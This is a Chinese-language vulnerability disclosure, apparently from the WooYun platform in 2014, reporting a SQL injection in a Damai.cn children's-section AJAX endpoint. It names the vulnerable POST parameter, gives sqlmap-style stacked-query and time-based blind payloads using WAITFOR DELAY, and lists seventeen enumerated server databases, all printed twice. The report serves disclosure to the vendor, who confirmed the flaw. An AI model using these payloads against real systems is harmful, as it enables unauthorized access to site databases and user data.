漏洞详情

披露状态:

2014-02-22: 细节已通知厂商并且等待厂商处理中
2014-02-28: 厂商已经确认,细节仅向厂商公开
2014-03-10: 细节向核心白帽子及相关领域专家公开
2014-03-20: 细节向普通白帽子公开
2014-03-30: 细节向实习白帽子公开
2014-04-08: 细节向公众公开

简要描述:

大麦网sql注入一枚

详细说明:

注入点:http://kids.damai.cn/KidsAjax.aspx

post数据:_action=GetBirthList&bt=2007-1-1&t=6-12%E5%B2%81&m=0&n=5.068997277412564

注入参数:t



---
Place: POST
Parameter: t
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: _action=GetBirthList&bt=2007-1-1&t=6-12岁'; WAITFOR DELAY '0:0:5';-- AND 'ISFV'='ISFV&m=0&n=5.068997277412564

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: _action=GetBirthList&bt=2007-1-1&t=6-12岁' WAITFOR DELAY '0:0:5'-- AND 'wszU'='wszU&m=0&n=5.068997277412564
---

available databases [17]:
[*] Account
[*] ControlCenter
[*] CP
[*] CRM
[*] master
[*] model
[*] msdb
[*] Piao_4.0
[*] ScoreCenter_3.0
[*] shopping
[*] SuperTicketDB
[*] tempdb
[*] test01
[*] test131
[*] TradeCenter
[*] TravelSystem_BJ
[*] usercenter

漏洞证明:

---
Place: POST
Parameter: t
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: _action=GetBirthList&bt=2007-1-1&t=6-12岁'; WAITFOR DELAY '0:0:5';-- AND 'ISFV'='ISFV&m=0&n=5.068997277412564

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: _action=GetBirthList&bt=2007-1-1&t=6-12岁' WAITFOR DELAY '0:0:5'-- AND 'wszU'='wszU&m=0&n=5.068997277412564
---

available databases [17]:
[*] Account
[*] ControlCenter
[*] CP
[*] CRM
[*] master
[*] model
[*] msdb
[*] Piao_4.0
[*] ScoreCenter_3.0
[*] shopping
[*] SuperTicketDB
[*] tempdb
[*] test01
[*] test131
[*] TradeCenter
[*] TravelSystem_BJ
[*] usercenter

修复方案:

过滤

版权声明:转载请注明来源 Mr .LZH@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-02-28 18:17

厂商回复:

你好感谢您提供的网站漏洞,后续情况我会在跟您沟通

最新状态:

暂无


漏洞评价: